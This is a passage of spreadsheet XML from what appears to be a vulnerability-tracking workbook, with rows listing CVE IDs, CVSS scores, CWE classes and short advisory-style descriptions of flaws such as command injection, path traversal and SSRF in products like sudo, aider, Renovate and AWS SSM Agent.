      <c r="B1561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81540</t>
        </is>
      </c>
      <c r="C1561" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1561" s="5" t="inlineStr"/>
      <c r="F1561" s="5" t="inlineStr"/>
      <c r="G1561" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1561" s="5" t="inlineStr"/>
      <c r="I1561" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1561" s="5" t="inlineStr"/>
      <c r="K1561" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1561" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to overwrite ruleset files belonging to other tenants due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M1561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81540</t>
        </is>
      </c>
    </row>
    <row r="1562">
      <c r="A1562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82474</t>
        </is>
      </c>
      <c r="C1562" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1562" s="5" t="inlineStr"/>
      <c r="F1562" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1562" s="5" t="inlineStr"/>
      <c r="H1562" s="5" t="inlineStr"/>
      <c r="I1562" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J1562" s="5" t="inlineStr"/>
      <c r="K1562" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1562" s="5" t="inlineStr">
        <is>
          <t>Sudo through 1.9.17p2 fails to apply intercept policy checks to the execveat system call in ptrace-based intercept mode. Users permitted to run specific commands can execute denied programs by calling execveat directly or through fexecve, bypassing policy enforcement and logging.</t>
        </is>
      </c>
      <c r="M1562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82474</t>
        </is>
      </c>
    </row>
    <row r="1563">
      <c r="A1563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84063</t>
        </is>
      </c>
      <c r="C1563" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1563" s="5" t="inlineStr"/>
      <c r="F1563" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1563" s="5" t="inlineStr"/>
      <c r="H1563" s="5" t="inlineStr"/>
      <c r="I1563" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1563" s="5" t="inlineStr"/>
      <c r="K1563" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1563" s="5" t="inlineStr">
        <is>
          <t>BurgerEditor 3.2.0 through 3.4.0 contains an issue with unrestricted upload of file with dangerous type. If this vulnerability is exploited, an arbitrary file may be uploaded by an attacker who can log in to the product, potentially allowing arbitrary PHP code to be executed may be caused.</t>
        </is>
      </c>
      <c r="M1563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84063</t>
        </is>
      </c>
    </row>
    <row r="1564">
      <c r="A1564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84226</t>
        </is>
      </c>
      <c r="C1564" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1564" s="5" t="inlineStr"/>
      <c r="F1564" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1564" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1564" s="5" t="inlineStr"/>
      <c r="I1564" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1564" s="5" t="inlineStr"/>
      <c r="K1564" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L1564" s="5" t="inlineStr">
        <is>
          <t>OpenVPN version 2.5.0 through 2.6.22 and 2.7_alpha1 through 2.7.6 on Windows allows local authenticated users to perform a binary planting attack during network configuration steps</t>
        </is>
      </c>
      <c r="M1564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84226</t>
        </is>
      </c>
    </row>
    <row r="1565">
      <c r="A1565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85012</t>
        </is>
      </c>
      <c r="C1565" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1565" s="5" t="inlineStr"/>
      <c r="F1565" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1565" s="5" t="inlineStr"/>
      <c r="H1565" s="5" t="inlineStr"/>
      <c r="I1565" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1565" s="5" t="inlineStr"/>
      <c r="K1565" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1565" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command (CWE-78) in the blueprint resynthesis framework in Amazon Web Services codecatalyst-blueprints before 0.3.156 might allow a user with permission to commit to a repository in the project to execute arbitrary commands in the blueprint resynthesis environment via shell metacharacters in the owner field of a [local] merge strategy entry in a crafted .ownership-file.
Version 0.3.156 removes shell interpretation of the owner field, running the command directly rather than through a shell, and rejects values outside an allowlisted command form. This eliminates shell metacharacter command injection. To remediate this issue, users should upgrade to version 0.3.156 or later.
No action is required for use of the Amazon CodeCatalyst service. Resynthesis runs in an isolated per-project environment with scoped credentials, and the service applies server-side validation there that rejects [local] merge strategy commands outside a restricted allowlisted form, including for blueprint versions published before 0.3.156.</t>
        </is>
      </c>
      <c r="M1565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85012</t>
        </is>
      </c>
    </row>
    <row r="1566">
      <c r="A1566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85384</t>
        </is>
      </c>
      <c r="C1566" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1566" s="5" t="inlineStr"/>
      <c r="F1566" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1566" s="5" t="inlineStr"/>
      <c r="H1566" s="5" t="inlineStr"/>
      <c r="I1566" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1566" s="5" t="inlineStr"/>
      <c r="K1566" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1566" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the httpd component of RE210 AC750 due to improper bounds checking in the splitString function when processing an uploaded configuration file. An authenticated attacker on the local network can upload a crafted configuration file to trigger the overflow, leading to remote code execution.
Successful exploitation may allow unauthorized access to sensitive information, modification of device configuration and network behavior, or disruption of device availability.</t>
        </is>
      </c>
      <c r="M1566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85384</t>
        </is>
      </c>
    </row>
    <row r="1567">
      <c r="A1567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85439</t>
        </is>
      </c>
      <c r="C1567" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1567" s="5" t="inlineStr"/>
      <c r="F1567" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1567" s="5" t="inlineStr"/>
      <c r="H1567" s="5" t="inlineStr"/>
      <c r="I1567" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1567" s="5" t="inlineStr"/>
      <c r="K1567" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1567" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 contains a remote code execution vulnerability in alogsplit's SplitHandler::handlePreCheckSplitDir() function that fails to sanitize shell metacharacters in log file pathnames. Attackers can embed shell syntax in log file names or the --dir parameter to execute arbitrary commands with the privileges of the operator running alogsplit.</t>
        </is>
      </c>
      <c r="M1567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85439</t>
        </is>
      </c>
    </row>
    <row r="1568">
      <c r="A1568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85656</t>
        </is>
      </c>
      <c r="C1568" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1568" s="5" t="inlineStr"/>
      <c r="F1568" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1568" s="5" t="inlineStr">
        <is>
          <t>java, log4j</t>
        </is>
      </c>
      <c r="H1568" s="5" t="inlineStr"/>
      <c r="I1568" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1568" s="5" t="inlineStr"/>
      <c r="K1568" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1568" s="5" t="inlineStr">
        <is>
          <t>An OS command injection issue in the log4j-cve-2021-44228-hotpatch package in Amazon Linux before 1.3-9 might allow a local user to execute arbitrary commands with root privileges via a Java process whose executable path contains embedded newline characters.</t>
        </is>
      </c>
      <c r="M1568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85656</t>
        </is>
      </c>
    </row>
    <row r="1569">
      <c r="A1569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85674</t>
        </is>
      </c>
      <c r="C1569" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1569" s="5" t="inlineStr"/>
      <c r="F1569" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1569" s="5" t="inlineStr"/>
      <c r="H1569" s="5" t="inlineStr"/>
      <c r="I1569" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1569" s="5" t="inlineStr"/>
      <c r="K1569" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1569" s="5" t="inlineStr">
        <is>
          <t>aider (aider-chat) automatically loads a .aider.conf.yml configuration file from the root of the git repository it is launched in. A crafted repository can set test-cmd (executed at startup) or lint-cmd (executed on the first file edit), which aider runs through a shell (subprocess with shell=True) without any user confirmation, LLM interaction, or API key. Consequently, a user who clones and runs aider inside an attacker-supplied repository achieves arbitrary command execution on their machine. The behavior is long-standing and was confirmed on 0.86.3.dev (current main).</t>
        </is>
      </c>
      <c r="M1569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85674</t>
        </is>
      </c>
    </row>
    <row r="1570">
      <c r="A1570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86095</t>
        </is>
      </c>
      <c r="C1570" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1570" s="5" t="inlineStr"/>
      <c r="F1570" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1570" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H1570" s="5" t="inlineStr"/>
      <c r="I1570" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1570" s="5" t="inlineStr"/>
      <c r="K1570" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1570" s="5" t="inlineStr">
        <is>
          <t>Unidata netcdf-c through 4.10.1 contains an out-of-bounds write vulnerability in NC4_HDF5_inq_attname() that copies HDF5 attribute names into a fixed 256-byte buffer without length validation. Attackers can craft HDF5 files with oversized attribute names to overflow the destination buffer, causing memory corruption and crashes when applications enumerate attribute names.</t>
        </is>
      </c>
      <c r="M1570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86095</t>
        </is>
      </c>
    </row>
    <row r="1571">
      <c r="A1571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86492</t>
        </is>
      </c>
      <c r="C1571" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1571" s="5" t="inlineStr"/>
      <c r="F1571" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1571" s="5" t="inlineStr"/>
      <c r="H1571" s="5" t="inlineStr"/>
      <c r="I1571" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1571" s="5" t="inlineStr"/>
      <c r="K1571" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L1571" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 a shared token cache allowed cross-tenant theft of GitHub App installation tokens</t>
        </is>
      </c>
      <c r="M1571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86492</t>
        </is>
      </c>
    </row>
    <row r="1572">
      <c r="A1572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86540</t>
        </is>
      </c>
      <c r="C1572" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1572" s="5" t="inlineStr"/>
      <c r="F1572" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1572" s="5" t="inlineStr"/>
      <c r="H1572" s="5" t="inlineStr"/>
      <c r="I1572" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1572" s="5" t="inlineStr"/>
      <c r="K1572" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1572" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 fail to validate the settings.lsp.languages binary field in project configuration files, allowing attackers to execute arbitrary binaries by crafting a malicious .knowns/config.json file. When a repository with a crafted configuration is opened, the unvalidated binary path is executed twice under the user's account without any verification.</t>
        </is>
      </c>
      <c r="M1572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86540</t>
        </is>
      </c>
    </row>
    <row r="1573">
      <c r="A1573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86754</t>
        </is>
      </c>
      <c r="C1573" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1573" s="5" t="inlineStr"/>
      <c r="F1573" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1573" s="5" t="inlineStr"/>
      <c r="H1573" s="5" t="inlineStr"/>
      <c r="I1573" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1573" s="5" t="inlineStr"/>
      <c r="K1573" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1573" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate Laravel Passport's OAuth client management routes, allowing any authenticated user to register OAuth clients with attacker-controlled redirect URIs. Attackers can trick administrators into approving consent screens, then exchange authorization codes for bearer tokens inheriting full admin API permissions lasting up to 40 years.</t>
        </is>
      </c>
      <c r="M1573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86754</t>
        </is>
      </c>
    </row>
    <row r="1574">
      <c r="A1574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87023</t>
        </is>
      </c>
      <c r="C1574" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1574" s="5" t="inlineStr"/>
      <c r="F1574" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1574" s="5" t="inlineStr"/>
      <c r="H1574" s="5" t="inlineStr"/>
      <c r="I1574" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1574" s="5" t="inlineStr"/>
      <c r="K1574" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1574" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M1574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87023</t>
        </is>
      </c>
    </row>
    <row r="1575">
      <c r="A1575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87030</t>
        </is>
      </c>
      <c r="C1575" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1575" s="5" t="inlineStr"/>
      <c r="F1575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1575" s="5" t="inlineStr"/>
      <c r="H1575" s="5" t="inlineStr"/>
      <c r="I1575" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1575" s="5" t="inlineStr"/>
      <c r="K1575" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1575" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M1575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87030</t>
        </is>
      </c>
    </row>
    <row r="1576">
      <c r="A1576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88886</t>
        </is>
      </c>
      <c r="C1576" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1576" s="5" t="inlineStr"/>
      <c r="F1576" s="5" t="inlineStr"/>
      <c r="G1576" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1576" s="5" t="inlineStr"/>
      <c r="I1576" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1576" s="5" t="inlineStr"/>
      <c r="K1576" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1576"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M1576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88886</t>
        </is>
      </c>
    </row>
    <row r="1577">
      <c r="A1577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88889</t>
        </is>
      </c>
      <c r="C1577" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1577" s="5" t="inlineStr"/>
      <c r="F1577" s="5" t="inlineStr"/>
      <c r="G1577" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1577" s="5" t="inlineStr"/>
      <c r="I1577" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1577" s="5" t="inlineStr"/>
      <c r="K1577" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1577" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.14.7 contains a command injection vulnerability in the Maven Wrapper manager that allows attackers to execute arbitrary commands by specifying a malicious distributionType parameter in maven-wrapper.properties. Attackers can inject shell commands through unescaped distributionType values to achieve remote code execution when Renovate processes Maven Wrapper updates in binarySource=docker mode.</t>
        </is>
      </c>
      <c r="M1577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88889</t>
        </is>
      </c>
    </row>
    <row r="1578">
      <c r="A1578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89049</t>
        </is>
      </c>
      <c r="C1578" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1578" s="5" t="inlineStr"/>
      <c r="F1578" s="5" t="inlineStr"/>
      <c r="G1578" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1578" s="5" t="inlineStr"/>
      <c r="I1578" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1578" s="5" t="inlineStr"/>
      <c r="K1578" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-918</t>
        </is>
      </c>
      <c r="L1578" s="5" t="inlineStr">
        <is>
          <t>A server-side request forgery issue due to improper validation of equivalent address representations in the port forwarding to remote hosts functionality in Amazon AWS Systems Manager Agent (SSM Agent) before 3.3.4851.0 on all platforms might allow an authenticated remote user to bypass the remote destination denylist and reach link-local endpoints, potentially obtaining the temporary IAM role credentials of a managed instance and acting with that role's permissions from outside the instance, via a crafted destination host value that uses an alternate representation of a denied link-local address.
To remediate this issue, users should upgrade to version 3.3.4851.0 or later.</t>
        </is>
      </c>
      <c r="M1578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89049</t>
        </is>
      </c>
    </row>
    <row r="1579">
      <c r="A1579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9853</t>
        </is>
      </c>
      <c r="C1579" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1579" s="5" t="inlineStr"/>
      <c r="F1579" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1579" s="5" t="inlineStr"/>
      <c r="H1579" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="I1579" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1579" s="5" t="inlineStr"/>
      <c r="K1579" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="L1579" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in SYS600 which allows any user authenticated to the operating system of the server hosting the application to read and modify application objects without being authenticated to the SYS600 system itself.
Only the SYS600 system users should be permitted to view and modify application objects.</t>
        </is>
      </c>
      <c r="M1579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9853</t>
        </is>
      </c>
    </row>
    <row r="1580">
      <c r="A1580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9854</t>
        </is>
      </c>
      <c r="C1580" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1580" s="5" t="inlineStr"/>
      <c r="F1580" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1580" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1580" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="I1580" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1580" s="5" t="inlineStr"/>
      <c r="K1580" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="L1580" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in SYS600 RBAC mechanism where users having access to the engineering tools could elevate their privileges to administrator level on the underlying Windows host, granting themselves full control over the host machine.</t>
        </is>
      </c>
      <c r="M1580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9854</t>
        </is>
      </c>
    </row>
    <row r="1581">
      <c r="A1581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1581" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-12737</t>
        </is>
      </c>
      <c r="C1581" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1581" s="5" t="inlineStr"/>
      <c r="F1581" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1581" s="5" t="inlineStr"/>
      <c r="H1581" s="5" t="inlineStr">
        <is>
          <t>wso2:api_control_plane, wso2:api_manager, wso2:identity_server, wso2:identity_server_as_key_manager, wso2:open_banking_am, wso2:open_banking_iam, wso2:traffic_manager, wso2:universal_gateway</t>
        </is>
      </c>
      <c r="I1581" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1581" s="5" t="inlineStr"/>
      <c r="K1581" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1581" s="5" t="inlineStr">
        <is>
          <t>The administrative operations within the Carbon Console do not adequately validate specific user-supplied input. This oversight allows a malicious actor with administrative privileges to inject and execute arbitrary code remotely.
Successful exploitation enables a threat actor with administrative privileges and Carbon Console access to execute remote arbitrary code through specific administrative operations, leading to a complete compromise of the affected system.</t>
        </is>
      </c>
      <c r="M1581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-12737</t>
        </is>
      </c>
    </row>
    <row r="1582">
      <c r="A1582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0008</t>
        </is>
      </c>
      <c r="C1582" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1582" s="5" t="inlineStr"/>
      <c r="F1582" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1582" s="5" t="inlineStr"/>
      <c r="H1582" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I1582" s="5" t="inlineStr">
        <is>
          <t>2026-03-02</t>
        </is>
      </c>
      <c r="J1582" s="5" t="inlineStr"/>
      <c r="K1582" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L1582" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of FaceEnroll.kt, there is a possible privilege escalation due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0008</t>
        </is>
      </c>
    </row>
    <row r="1583">
      <c r="A1583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0010</t>
        </is>
      </c>
      <c r="C1583" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="D1583" s="5" t="inlineStr">
        <is>
